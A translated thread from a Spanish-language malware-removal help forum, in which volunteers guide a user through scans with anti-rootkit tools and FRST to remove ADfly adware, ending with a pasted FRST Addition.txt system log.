Infected with Usfin.net ADfly adware

Hello, how are you?

Sorry for the delay; let's try the following:

  • Download Malwarebytes-AntiRootkits, follow the instructions in its manual, and bring me its analysis reports, Mbar-log.txt and System-log.txt, as indicated in its manual (Updating the Database).

  • Download, install and run TDSSKiller. Check all the boxes (Loaded Modules, Verify file digital signatures and Detect TDLFS file system). If it asks you to restart, do so, run the tool again, and once you check the boxes I mentioned again, it will let you scan.

Bring the reports and let us know how it goes

Regards

1 like

Hello @hectordj69, carry out the steps my colleague @DanielG has described; if the procedures my colleague @DanielG has described do not solve the problem, I would try to solve your problem myself.

Regards.

Thanks for your replies, friends. Here are the requested reports.

Malwarebytes Anti-Rootkit BETA 1.10.3.1001

Database version: main: v2021.12.30.04 rootkit: v2021.12.30.04

Windows 10 x64 NTFS Internet Explorer 11.789.19041.0 Spices :: DESKTOP-RLQ6923 [administrator]

12/30/2021 8:53:02 AM mbar-log-2021-12-30 (08-53-02).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 319878
Time elapsed: 18 minute(s), 59 second(s)

Memory Processes Detected: 0 (No malicious items detected)

Memory Modules Detected: 0 (No malicious items detected)

Registry Keys Detected: 0 (No malicious items detected)

Registry Values Detected: 0 (No malicious items detected)

Registry Data Items Detected: 0 (No malicious items detected)

Folders Detected: 0 (No malicious items detected)

Files Detected: 0 (No malicious items detected)

Physical Sectors Detected: 0 (No malicious items detected)

(end)

1 like

The System-log.txt report from Malwarebytes and the TDSSKiller ones are missing

Regards

The TDSSKiller one is attached because it is too long.

TDSKiller.txt (120,0 KB)

Malwarebytes system-log.txt (133,0 KB) System-log.txt

Hello again

It appears to be clean according to the reports.

Download Kaspersky Virus Removal Tool and run it following its manual. When it finishes, bring the report.

Download HitmanPro; its manual explains how to use it correctly. Bring the report.

Open CCleaner and do the following: go to Tools → Startup → Windows → save to a text file. Paste that report in your next reply. Then, again in CCleaner, go to Tools → Startup → Scheduled Tasks → save to a text file, and paste it in your next reply.

Let us know how everything goes

Regards

Hello @hectordj69.

With the permission of my colleagues @DanielG and @Chicloi.

Looking at your case, the reports and everything you describe, everything points to you having persistent adware that will not be removed just like that.

First of all, I must inform you that this forum has never handled cases where a professional company is involved, and even less an IT service working for commercial company 'X'. Rather, it has always served private individuals or end users as such.

This is basically for the following reasons:

  1. In this forum we use some high-powered tools. Nothing is 100% safe, and something in the disinfection of the machine could go wrong and things could go awry. Although we take appropriate measures so that if something goes awry it can be fixed, it is not always possible.

  2. If it is a commercial company you work for, @hectordj69, that company is supposed to pay a real, specialized IT service to deal with this kind of situation, and that IT service should resolve them without any problem.

That said, you are the IT service:

Therefore, you should have sufficient and necessary knowledge to deal with this situation without problems.

I should close this thread and not let it continue. But since the thread has already progressed quite a bit, other colleagues of mine have been helping you, and you are a new user, I will leave it open and, with the permission of @DanielG, @Chicloi and yourself @hectordj69, I am going to take over the case, since we will use FRST (FARBAR).

Otherwise, we will not be able to remove this malware. But let it be clear that this tool is high-powered, which means that if it is not used correctly or you do not follow the instructions I give you, things could happen that should not happen.

Before we go on to use this tool, let it be very clear both to you and to the company you work for that:

A company has to pay for a real IT service that can deal with these situations without problems.

:+1:, so, exceptionally, we will make an exception and handle your case.

3 likes

That said, before going ahead with FRST I want you to read the forum policies and to fully agree with and respect all the forum policies, but especially and above all the following:

1.1 Use of this community constitutes your acceptance of these terms of use and of any modifications made to them. Ignoring or being unaware of InfoSpyware's rules and policies does not exempt any user from complying with them. We reserve the right to exclude or deny entry to anyone who does not comply with them or disagrees with them.

1.3 We reserve the right to move, delete, edit or close threads or posts that violate the established rules and policies, or for administrative reasons, at our discretion and without giving any prior or subsequent explanation.

2.5 Repeating one or more threads on the same subject is not permitted, nor is posting two or more messages with matching content within the same thread. Such threads or posts may be deleted or merged without prior or subsequent notice.

2.6 For the safety of our users, the use of powerful malware detection and removal tools such as HijackThis, OTL, DDS, FARBAR and ComboFix is restricted, as is the use of custom scripts and/or batch files, as well as any other tool/program that is not available from our main site www.infospyware.com and/or in the forum's Guides or Tutorials; these may only be recommended by members of our specialized Staff.

2.7 Moderators reserve the right to edit, modify or outright delete, without prior notice, any replies they consider erroneous as help to another user, or that muddle or derail the main topic.

5.1 We are here to help, but we are human and can make mistakes, so the InfoSpyware team is NOT responsible for any kind of damage to your system, misuse of the guides, manuals, advice, recommended steps to follow, programs provided, etc. Use these at your own risk!

5.2 Remember that: we are NOT a company that charges you for services, we are NOT a technical support service, we do NOT operate 24 hours a day; we are human, and we also have our jobs, responsibilities, problems and families to attend to; we are volunteers. In conclusion, we are only a COMMUNITY (FORUM) OF VOLUNTEER HELPERS who will try to help you on a non-profit basis, asking nothing in return other than that these rules and policies be respected. Above all, respect and camaraderie toward those who voluntarily devote their time to trying to help others.

If you agree with all of this, tell me and we will go ahead with FRST to solve your problem. If not, tell me that too.

Regards to all.

3 likes

@Marr0n Good morning and nice to meet you! Thank you for clarifying all these things for me; I completely agree with the policies.

I understand that there are delicate procedures and I am willing to follow your instructions to the letter. Many thanks in advance.

2 likes

:+1: agreed. Well, if you are happy with everything I have said… Let's go.

:one: Disable your antivirus :arrow_forward: How to temporarily disable an antivirus and any security program you have enabled.

DOWNLOAD IT TO YOUR DESKTOP, VERY IMPORTANT (and nowhere else).

Download Farbar Recovery Scan Tool. VERY IMPORTANT >> select the appropriate version for your computer's architecture (32 or 64 bits). :arrow_forward: How do I know whether my Windows is 32 or 64 bits?

:warning: Once FRST is downloaded, disconnect your computer completely from the Internet (turn off the router) >> Super Important. Immediately afterwards, also close any other program you have open.

:two: Farbar Recovery Scan Tool

  1. Run FRST.exe (if you use Windows Vista/7/8 or 10, right-click it and select Run as Administrator).

  2. A window with a Disclaimer message will appear; click Sí or Yes.

  3. In the program's main window, click Analizar/Scan and wait for the scan to finish.

  4. Two logs/reports will appear: Frst.txt and Addition.txt; these will be saved on the desktop.

:three: Re-enable your antivirus and any security program you have enabled. Also reconnect your computer to the Internet.

:four: NEXT REPLY

Paste the FRST and Addition.txt reports. You must post both reports in full, with absolutely all of their content. You will need to split them across several messages if you get an error/warning message saying that the report making up the message is too long (more than approx. 50,000 characters).

IMPORTANT NOTE

Please, while we are disinfecting your machine or finishing doing so:

  • Do not carry out steps/actions that WE have not told you to.
  • Do not download ANYTHING from the Internet and/or connect external devices to your computer.
  • Do not install ANYTHING (programs/software/add-ons/browser extensions…).
  • Do not run other security programs (Antivirus, Antimalware, ANTI-ANYTHING…).
  • Do not carry out other procedures on your own.
  • Use your computer EXCLUSIVELY to disinfect it following our instructions.

:warning: Very Important :warning: Post the different reports I have asked you for as shown in the following image:

Regards.

1 like

Hello @hectordj69

I saw that you recently logged in to the forum.

Were you able to make any progress?

Regards.

Addition.txt

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-12-2021
Ran by Spices (06-01-2022 08:41:55)
Running from C:\Users\Spices\OneDrive\Documents\OneDrive\Desktop
Microsoft Windows 10 Pro Version 21H1 19043.1415 (X64) (2020-11-13 17:18:33)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================


(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-1001776605-1151265979-3107129937-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1001776605-1151265979-3107129937-503 - Limited - Disabled)
Guest (S-1-5-21-1001776605-1151265979-3107129937-501 - Limited - Disabled)
QBDataServiceUser27 (S-1-5-21-1001776605-1151265979-3107129937-1002 - Limited - Enabled) => C:\Users\TEMP.DESKTOP-RLQ6923.005
Spices (S-1-5-21-1001776605-1151265979-3107129937-1001 - Administrator - Enabled) => C:\Users\Spices
WDAGUtilityAccount (S-1-5-21-1001776605-1151265979-3107129937-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Spybot - Search and Destroy (Disabled - Out of date) {F77C7796-45C4-531E-0DAE-B4A8229B11C8}
AV: ESET Security (Disabled - Up to date) {89B55CC4-3881-78B2-11E2-479AE0371896}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {4FC75CA5-1654-5411-7CFB-1893D506BCF4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG Antivirus (Enabled - Up to date) {F4A6BD41-306E-5B9F-464B-23E1AE81F649}
FW: AVG Antivirus (Enabled) {77FCDD80-5C3B-5549-57A4-B1A62BD5FB8F}
FW: ESET Firewall (Enabled) {B18EDDE1-72EE-79EA-3ABD-EEAF1EE45FED}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat DC (64-bit) (HKLM\...\{AC76BA86-1033-1033-7760-BC15014EA700}) (Version: 21.007.20099 - Adobe)
Backup and Sync from Google (HKLM\...\{685BAD50-A3AA-4B91-A15B-77F9DC7346D4}) (Version: 3.57.4043.4118 - Google, Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.87 - Piriform)
CCleaner Browser (HKLM-x32\...\CCleaner Browser) (Version: 96.1.13589.113 - Piriform Software)
CCleaner Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.8.1067.0 - Piriform Software) Hidden
Data Lifeguard Diagnostic for Windows 1.31 (HKLM-x32\...\{519C4DB6-B53B-4F5C-8297-89B2BE949FA5}_is1) (Version:  - Western Digital Corporation)
DesignPro 5.4 Limited Edition (HKLM-x32\...\InstallShield_{71F6DF7D-B639-4FAD-BA93-E6DF267AA44D}) (Version: 5.2.1201 - Avery Dennison)
ESET Security (HKLM\...\{4DB10B50-978B-4DB0-8127-79F8D302AC5A}) (Version: 15.0.21.0 - ESET, spol. s r.o.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 96.0.4664.110 - Google LLC)
Google Drive (HKLM\...\{6BBAE539-2232-434A-A4E5-9A33560C6283}) (Version: 54.0.2.0 - Google LLC)
HP Color LaserJet MFP M278-M281 Help (HKLM-x32\...\{3DF29BF3-A40D-4BDC-BE5D-FA592999A767}) (Version: 0.00.0005 - HP)
HP ColorLaserJet MFP M278-M281 Basic Device Software (HKLM\...\{61F983A9-6F6F-40F0-B4AA-FF2B17BAB911}) (Version: 44.1.2549.17189 - HP Inc.)
HP Dropbox Plugin (HKLM-x32\...\{EF65265C-816D-4992-A8CC-C91CDEC9ED33}) (Version: 36.0.102.68541 - HP)
HP EmailSMTP Plugin (HKLM-x32\...\{858E7C53-B406-4798-B4CA-761420FF2B5F}) (Version: 43.0.0.0 - HP)
HP FTP Plugin (HKLM-x32\...\{07DA4F28-63FA-43F7-A554-B159E9A7E649}) (Version: 43.0.0.0 - HP)
HP Google Drive Plugin (HKLM-x32\...\{CF634681-E024-430C-AFF2-B9EE43A7E452}) (Version: 36.0.102.68541 - HP)
HP OneDrive Plugin (HKLM-x32\...\{1E191DFB-7B91-4B11-AB95-884D59ECE599}) (Version: 36.0.0.0 - HP)
HP SharePoint Plugin (HKLM-x32\...\{1ED7BE66-39E7-4A65-8EEF-68CE80F3416C}) (Version: 43.0.0.0 - HP)
HPDiagnosticCoreDll (HKLM-x32\...\{9262B08F-E183-4FED-A2BD-23FF1A84EB79}) (Version: 1.0.15.0 - Hewlett Packard)
I.R.I.S OCR (HKLM-x32\...\{3913CCF7-436B-4A7A-A265-62E9FFDD03D9}) (Version: 15.2.10.1114 - HP Inc.)
Java 8 Update 191 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180191F0}) (Version: 8.0.1910.12 - Oracle Corporation)
Java 8 Update 201 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180201F0}) (Version: 8.0.2010.9 - Oracle Corporation)
JeRM Process Viewer 1.1.0.3 (HKLM-x32\...\JeRM Process Viewer_is1) (Version:  - )
Malwarebytes version 4.4.11.149 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.4.11.149 - Malwarebytes)
Microsoft 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.14701.20262 - Microsoft Corporation)
Microsoft 365 Apps for enterprise - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 16.0.14701.20262 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 96.0.1054.62 - Microsoft Corporation)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 96.0.1054.62 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\OneDriveSetup.exe) (Version: 21.230.1107.0004 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Teams) (Version: 1.2.00.19260 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{29B15818-E79F-4AB0-8938-9410C807AD76}) (Version: 2.84.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
MSRX (HKLM-x32\...\MSRXv2017) (Version: v2017 - )
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.14701.20262 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.14701.20248 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.14701.20262 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.14131.20278 - Microsoft Corporation) Hidden
Product Improvement Study for HP ColorLaserJet MFP M278-M281 (HKLM\...\{8ADB6C99-9D2B-4069-B9C7-995E517EFE28}) (Version: 44.1.2549.17189 - HP Inc.)
QuickBooks (HKLM-x32\...\{B52E01F1-D34E-4381-B590-28DFF3C0B647}) (Version: 27.0.4016.2702 - Intuit Inc.) Hidden
QuickBooks Desktop File Doctor (HKLM-x32\...\{07441683-C1C3-43BC-B3E7-F213B3A69B76}) (Version: 4.6.0.0 - Intuit Inc.)
QuickBooks Pro 2017 (HKLM-x32\...\{82F55A7D-6BEB-436B-A1DC-586E113782D7}) (Version: 27.0.4001.2702 - Intuit Inc.)
QuickBooks Runtime Redistributable (HKLM\...\{F2A4F809-2DE6-4D27-888B-4D2BB8DAF20E}) (Version: 1.00.0000 - Intuit Inc.)
RepairSolutions (HKLM-x32\...\{94FA6651-E735-48D4-950A-93291C14DB63}) (Version: 3.0.19 - Innova Electronics)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.8.68.0 - Safer-Networking Ltd.)
Teams Machine-Wide Installer (HKLM-x32\...\{39AF0813-FA7B-4860-ADBE-93B9B214B914}) (Version: 1.2.0.19260 - Microsoft Corporation)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.25.8 - TeamViewer)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Windows PC Health Check (HKLM\...\{B1E7D0FD-7CFE-4E0C-A5DA-0F676499DB91}) (Version: 3.2.2110.14001 - Microsoft Corporation)
Winmail Reader 1.2.15 (HKLM-x32\...\Winmail Reader_is1) (Version:  - Kopf)

Packages:
=========
Autodesk SketchBook -> C:\Program Files\WindowsApps\89006A2E.AutodeskSketchBook_5.1.0.0_x64__tf1gferkr813w [2019-11-05] (Autodesk Inc.)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_133.1.340.0_x64__v10z8vjag6ke6 [2021-12-13] (HP Inc.)
JAR File Opener -> C:\Program Files\WindowsApps\62307pauljohn.JARFileOpener_1.2.0.0_neutral__7sv5v3m8wq0b2 [2018-04-16] (pauljohn)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-18] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-18] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.11.12160.0_x64__8wekyb3d8bbwe [2021-12-22] (Microsoft Studios) [MS Ad]
Open Any File -> C:\Program Files\WindowsApps\38184CDCTech.495572C750D15_1.2.102.0_x64__vwv5vk6p12k08 [2018-08-24] (For Better Digital Life - 1st Famous Tool Provider)
Open File Viewer (Free) -> C:\Program Files\WindowsApps\SolvusoftCorporation.32792D4052C2D_1.1.2.0_x86__8gdaqrm1kfbzy [2018-04-16] (Solvusoft Corporation)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-09-09] (Microsoft Corporation)
Reader Notification Client -> C:\Program Files\WindowsApps\ReaderNotificationClient_1.0.4.0_x86__e1rzdqpraam7r [2019-11-21] (Adobe Systems Incorporated)
Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.174.631.0_x86__zpdnekdrzrea0 [2021-12-10] (Spotify AB) [Startup Task]

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1001776605-1151265979-3107129937-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\Spices\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.19163.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1001776605-1151265979-3107129937-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\Spices\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.19163.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [    GoogleDriveCloudOverlayIconHandler] -> {A8E52322-8734-481D-A7E2-27B309EF8D56} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [    GoogleDriveMirrorBlacklistedOverlayIconHandler] -> {51EF1569-67EE-4AD6-9646-E726C3FFC8A2} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [    GoogleDrivePinnedOverlayIconHandler] -> {CFE8B367-77A7-41D7-9C90-75D16D7DC6B6} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [    GoogleDriveProgressOverlayIconHandler] -> {C973DA94-CBDF-4E77-81D1-E5B794FBD146} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync64.dll [2021-10-19] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync64.dll [2021-10-19] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync64.dll [2021-10-19] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ContextMenuHandlers1: [DriveFS 28 or later] -> {EE15C2BD-CECB-49F8-A113-CA1BFC528F5B} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll [2021-12-10] (ESET, spol. s r.o. -> ESET)
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2021-10-19] (Google LLC -> Google)
ContextMenuHandlers1: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2019-04-15] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
ContextMenuHandlers1: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2019-04-15] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll [2021-12-10] (ESET, spol. s r.o. -> ESET)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-12-10] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [DriveFS 28 or later] -> {EE15C2BD-CECB-49F8-A113-CA1BFC528F5B} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2021-10-19] (Google LLC -> Google)
ContextMenuHandlers5: [DriveFS 28 or later] -> {EE15C2BD-CECB-49F8-A113-CA1BFC528F5B} => C:\Program Files\Google\Drive File Stream\54.0.2.0\drivefsext.dll [2021-12-14] (Google LLC -> Google, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2017-03-09] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll [2021-12-10] (ESET, spol. s r.o. -> ESET)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-12-10] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2019-04-15] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
ContextMenuHandlers6: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2019-04-15] (Safer-Networking Ltd. -> Safer-Networking Ltd.)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2006-01-19 04:36 - 2006-01-19 04:36 - 001017856 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Intuit\QuickBooks 2017\dbghelp.dll
2020-04-18 08:45 - 2020-04-18 08:45 - 000000000 ____L (Microsoft Corporation) [simlink -> C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppvIsvSubsystems32.dll] C:\Program Files (x86)\Microsoft Office\Root\Office16\AppVIsvSubsystems32.dll
2020-04-18 08:45 - 2020-04-18 08:45 - 000000000 ____L (Microsoft Corporation) [simlink -> C:\Program Files\Common Files\Microsoft Shared\ClickToRun\C2R32.dll] C:\Program Files (x86)\Microsoft Office\Root\Office16\c2r32.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Users\Spices\Documents\para norma.jpeg:3or4kl4x13tuuug3Byamue2s4b [105]
AlternateDataStreams: C:\Users\Spices\Documents\para norma.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Spices\Documents\tapiascan.jpeg:3or4kl4x13tuuug3Byamue2s4b [105]
AlternateDataStreams: C:\Users\Spices\Documents\tapiascan.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\98963565.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\98963565.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_201\bin\ssv.dll [2020-01-30] (Oracle America, Inc. -> Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_201\bin\jp2ssv.dll [2020-01-30] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: intu-help-qb10 - {E795042F-8A29-42E4-B265-2C7AB38E8AEE} - C:\Program Files (x86)\Intuit\QuickBooks 2017\HelpAsyncPluggableProtocol.dll [2020-02-20] (Intuit, Inc. -> Intuit, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\SysWOW64\mscoree.dll [2019-12-07] (Microsoft Windows -> Microsoft Corporation)

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\sharepoint.com -> hxxps://campuen-files.sharepoint.com

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2017-09-29 05:46 - 2018-12-03 08:19 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

